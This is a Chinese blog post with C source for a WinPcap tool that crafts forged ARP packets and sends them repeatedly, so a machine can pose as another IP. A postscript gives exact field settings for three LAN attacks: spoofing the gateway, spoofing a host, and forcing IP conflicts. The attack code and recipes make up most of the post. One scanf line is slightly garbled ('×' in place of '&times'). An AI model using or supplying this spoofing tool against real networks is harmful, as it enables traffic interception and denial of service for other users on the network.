winpcap 发送arp 包

最新推荐文章于 2019-04-14 10:42:29 发布
最新推荐文章于 2019-04-14 10:42:29 发布
阅读量2.5k 收藏 6
点赞数
文章标签: struct input installer authentication include null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wegatron/article/details/7636929
版权

一、是winpcap的安装

1.winpcap 的installer: http://www.winpcap.org/install/default.htm

2.winpcap 的development packeg: http://www.winpcap.org/devel.htm

二、winpcap vc 2008 配置 http://hi.baidu.com/abobo1986/blog/item/85c665090c5761226a60fb71.html


然后就是源代码:

#include <stdio.h>
#include <pcap.h>
#include <conio.h>
#include <packet32.h>
#include <ntddndis.h>
#include <windows.h>


#ifndef MY_ARP_CHEAT_INCLUDE_H
#define MY_ARP_CHEAT_INCLUDE_H

//字节对齐必须是1
#pragma pack (1)
struct ethernet_head
{
	unsigned char dest_mac[6]; //目标主机MAC地址
	unsigned char source_mac[6]; //源端MAC地址
	unsigned short eh_type; //以太网类型
};

struct arp_head
{
	unsigned short hardware_type; //硬件类型:以太网接口类型为1
	unsigned short protocol_type; //协议类型:IP协议类型为0X0800
	unsigned char add_len; //硬件地址长度:MAC地址长度为6B
	unsigned char pro_len; //协议地址长度:IP地址长度为4B
	unsigned short option; //操作:ARP请求为1,ARP应答为2
	unsigned char sour_addr[6]; //源MAC地址:发送方的MAC地址
	unsigned long sour_ip; //源IP地址:发送方的IP地址
	unsigned char dest_addr[6]; //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址
	unsigned long dest_ip; //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址
	unsigned char padding[18];
};

struct arp_packet //最终arp包结构
{
	ethernet_head eth; //以太网头部
	arp_head arp; //arp数据包头部
};
#pragma pack ()
/**
* 获得网卡的MAC地址
* pDevName 网卡的设备名称
*/
/**
* 封装ARP请求包
* source_mac 源MAC地址
* srcIP 源IP
* destIP 目的IP
*/
unsigned char* BuildArpPacket(unsigned char* source_mac, unsigned char* dest_mac,
                       unsigned long src_ip,unsigned long dest_ip);

#endif



int main(void)
{
	char errbuf[PCAP_ERRBUF_SIZE];   //错误缓冲区
	int times;	//	发送次数
	int i = 0;

	unsigned char *packet;	//ARP包
	pcap_t *adhandle;	//一个pcap实例
	pcap_if_t *alldevs;	//	全部网卡列表
	pcap_if_t *device;	//	一个网卡
	int inum;	//	用户选择的网卡序号
	
	//	获得本机网卡列表
	if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
    {
		fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
		exit(1);
	}
    
	//	打印网卡列表
    for (device=alldevs; device; device=device->next)
    {
        printf("%d", ++i);
        if (device->description)
            printf(". %s\n", device->description);
        else
            printf(". No description available\n");
    }

    //	如果没有发现网卡
    if(i==0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;
    }
    //	请用户选择一个网卡
    printf("Enter the interface number (1-%d):",i);
    scanf("%d", &inum);

    //	移动指针到用户选择的网卡
    for (device=alldevs, i=0; i< inum-1 ;device=device->next, i++);

	char chs_src_ip[16] = "10.101.0.43";
	char chs_dest_ip[16] = "10.101.0.254";
	unsigned long ul_src_ip = 0u;
	unsigned long ul_dest_ip = 0u;

	printf("Input the src ip(10.101.0.143):");
	scanf("%s",chs_src_ip);
	ul_src_ip = inet_addr(chs_src_ip);
	printf("Input the dest ip(10.101.0.254):");
	scanf("%s",chs_dest_ip);
	ul_dest_ip = inet_addr(chs_dest_ip);

	unsigned char uchs_src_mac[10] = {0};
	unsigned char uchs_dest_mac[10] = {0};

	printf("Input source mac address(30 AD 23 A3 FC CD):");
	scanf("%x%x%x%x%x%x", &uchs_src_mac[0], &uchs_src_mac[1], &uchs_src_mac[2], 
		&uchs_src_mac[3], &uchs_src_mac[4], &uchs_src_mac[5]);

	printf("Input dest mac address(30 AD 23 A3 FC CD):");
	scanf("%x%x%x%x%x%x", &uchs_dest_mac[0], &uchs_dest_mac[1], &uchs_dest_mac[2], 
		&uchs_dest_mac[3], &uchs_dest_mac[4], &uchs_dest_mac[5]);

	printf("Input send times:");
	scanf("%d",×);
	packet = BuildArpPacket(uchs_src_mac, uchs_dest_mac, ul_src_ip, ul_dest_ip);
	
	/* 打开网卡 */
    if ( (adhandle= pcap_open(device->name,          // name of the device
                              65536,            // portion of the packet to capture
                              0,                //open flag
                              1000,             // read timeout
                              NULL,             // authentication on the remote machine
                              errbuf            // error buffer
                              ) ) == NULL)
    {
         fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n",
                  device->name);
         /* Free the device list */
         pcap_freealldevs(alldevs);
         return -1;
    }
	//构建假的ARP请求包,达到本机伪装成给定的IP地址的目的
	packet = BuildArpPacket(uchs_src_mac, uchs_dest_mac, ul_src_ip, ul_dest_ip);

	while (0 < times)
	{
		pcap_sendpacket(adhandle, packet, 60);
		Sleep(500u);
		times --;
	}
	printf("end!!!\n");
	return 0;
}

unsigned char* BuildArpPacket(unsigned char* source_mac, unsigned char* dest_mac,
                       unsigned long src_ip,unsigned long dest_ip)
{
	static struct arp_packet packet;
	//目的MAC地址为广播地址,FF-FF-FF-FF-FF-FF memset(packet.eth.dest_mac,0xFF,6);
	//目的MAC地址设置
	memcpy(packet.eth.dest_mac,dest_mac,6);
	//源MAC地址
	memcpy(packet.eth.source_mac,source_mac,6);
	//上层协议为ARP协议,0x0806
	packet.eth.eh_type = htons(0x0806);

	//硬件类型,Ethernet是0x0001
	packet.arp.hardware_type = htons(0x0001);
	//上层协议类型,IP为0x0800
	packet.arp.protocol_type = htons(0x0800);
	//硬件地址长度:MAC地址长度为0x06
	packet.arp.add_len = 0x06;
	//协议地址长度:IP地址长度为0x04
	packet.arp.pro_len = 0x04;
	//操作:ARP请求为1
	packet.arp.option = htons(0x0001);
	//源MAC地址
	memcpy(packet.arp.sour_addr,source_mac,6);
	//源IP地址
	packet.arp.sour_ip = src_ip;
	//目的MAC地址,填充0 memset(packet.arp.dest_addr,0,6);
	memcpy(packet.arp.dest_addr,dest_mac,6);
	//目的IP地址
	packet.arp.dest_ip = dest_ip;
	//填充数据,18B
	memset(packet.arp.padding,0,18);
	return (unsigned char*)&packet;
}

ps:我知道的arp攻击的几种方式 (局域网)

1.欺骗网关:

source_mac 设一个不存在的 不要和攻击主机的mac相同即可

dest_mac 设为网关

src_ip 设为攻击主机的ip地址
dest_ip 设置网关ip地址

2.欺骗主机

source_mac 设一个不存在的 不要和网关地址的mac相同即可

dest_mac 设为攻击主机的mac地址

src_ip 设为网关的ip地址
dest_ip 设置攻击主机ip地址







3.ip冲突


source_mac 设一个随即的不要和攻击主机mac地址相同即可

dest_mac 设为攻击主机的mac

src_ip 设为攻击主机的ip地址
dest_ip 设置攻击主机的ip地址

























                

        

        

    




    

      

        

            

              
                
                  wegatron
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    6
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
发送arp数据

				
			

			

				

					10-27
				

			

		

		

			
				
根据weipacp发送一个arp数据,根据自己的情况把ip和mac地址更改一下,就可以在vs上运行了,另外还得先配置坏境吧

			
		

	



                

              
                



	

		

			

				
					
linux网络-ARP协议

				
			

			

				

					风雨无阻
				

				

					07-27
					
					1711
					
				

			

		

		

			
				
arp协议

			
		

	



                


  
              

                


	

		

			

				
					
WinPcap实战(一)——发送ARP

					
热门推荐

				
			

			

				

					白夜的随笔
				

				

					09-17
					
					1万+
					
				

			

		

		

			
				
ARP的结构:
ARP格式:物理帧头(14B)——ARP帧结构(28B)——填充数据(18B)——CRC(4B)。这里给出一张图(图中没有18字节的填充数据和4字节的校验位):
物理帧头(14B):目的MAC (6B) ——源MAC(6B) ——类型(2B, ARP帧:0x0806)
ARP帧结构(28B):硬件类型(2B,Ethernet:0x1)——上层协议类型(2B,IP:0x0800)—

			
		

	





	

		

			

				
					
[源码和文档分享]基于Winpcap实现的发送ARP数据和IP数据

				
			

			

				

					qq_38474647的博客
				

				

					12-13
					
					539
					
				

			

		

		

			
				
1 项目介绍
      1.1 基本任务
      完成两台主机之间的数据通信(数据链路层)
      仿真ARP协议获得网段内主机的MAC表
      使用帧完成两台主机的通信(Hello! I’m …)
      1.2 高端任务
      完成两台主机通过中间主机的数据通信(网络层)
      增加基于IP地址的转发功能
      增加网络层封装...

			
		

	



		

			
		



	

		

			

				
					
winpcap发送arp

				
			

			

				

					04-21
				

			

		

		

			
				
winpcap发送arp数据来探测局域网中的主机,需要对ip和mac做一下修改

			
		

	





	

		

			

				
					
Qt-WinPcap发送和接收Arp

				
			

			

				

					10-12
				

			

		

		

			
				
本程序是使用Winpcap技术,实现Arp数据发送和接收,获得局域网内的所有在线设备的IP和Mac地址。代码也是在网上找的,自己稍作修改,组织成一个类,可以直接实例化并调用。环境搭建,代码里面都有,如果有不明白...

			
		

	





	

		

			

				
					
USTB-计算机网络实践-WinPcap 实现ARP数据分组的发送和解析

				
			

			

				

					03-28
				

			

		

		

			
				
①根据 ARP/ICMP/TCP 协议数据的结构,封装成数据帧发送给另 一台计算机(可以是手机);②捕获网络中ARP/ICMP/TCP 协议数据的数 180 据帧,解析协议数据的内容,并在标准输出中显示报文首部字段的内容,同 时...

			
		

	





	

		

			

				
					
用java实现ARP报文的发送

				
			

			

				

					10-14
				

			

		

		

			
				
用java实现ARP报文的发送,通过jpcap来调用winpcap。对所用到的几个类进行了描述。

			
		

	





	

		

			

				
					
发送ARP数据,抓检测 SharpPcap  winpcap

				
			

			

				

					12-02
				

			

		

		

			
				
能够发送ARP数据,同时抓提供检测功能呢

			
		

	





	

		

			

				
					
C++环境下发送ARP

				
			

			

				

					02-07
				

			

		

		

			
				
C++环境下发送arp的例子,可以获取各个IP的MAC地址。 C++环境下发送arp的例子,可以获取各个IP的MAC地址。

			
		

	





	

		

			

				
					
sendARP发送ARP信息

				
			

			

				

					01-02
				

			

		

		

			
				
一款专业针对测试用的发送ARP信息的工具

			
		

	





	

		

			

				
					
原始套接字发送ARP数据

				
			

			

				

					IDoubleTong的博客
				

				

					04-14
					
					4594
					
				

			

		

		

			
				
什么是ARP协议
    ARP协议是Address Resolution Protocol(地址解析协议)的缩写。在局域网中,网络中实际传输的是数据帧,数据帧里面有目的主机的MAC地址。但这个目的MAC地址是如何获取的呢?就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送数据帧之前将目标IP地址转化成目标MAC地址的过程。ARP协议的基本功能就是通...

			
		

	





	

		

			

				
					
发送ARP原始数据全过程

				
			

			

				

					gjtboa的专栏
				

				

					11-25
					
					1269
					
				

			

		

		

			
				
#pragma pack(push) //保存对齐状态
#pragma pack(1)//设定为1字节对齐


    // 定义ARP帧
    struct APRRequest
    {
        char chTargetMAC[6];        // 以太网MAC地址(ff ff ff ff ff ff作为广播地址)
        char chSource

			
		

	





	

		

			

				
					
不用安装Wincap程序实现ARP广播发送和接收

				
			

			

				

					
				

				

					10-09
					
					2311
					
				

			

		

		

			
				
这几天由于项目需求,做了一个局域网ip和MAC

			
		

	





	

		

			

				
					
jedis示例代码压缩

					
最新发布

				
			

			

				

					04-23
				

			

		

		

			
				
jedis示例代码

			
		

	





	

		

			

				
					
利用winpcap解析arp

				
			

			

				

					04-04
				

			

		

		

			
				
ARP(Address Resolution Protocol)是一种网络协议,用于将IP地址映射到物理地址,以便在网络上发送数据。WinPcap是一个开源的网络抓库,可以用于捕获和解析网络数据。下面是利用WinPcap解析ARP的步骤:  1. ...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值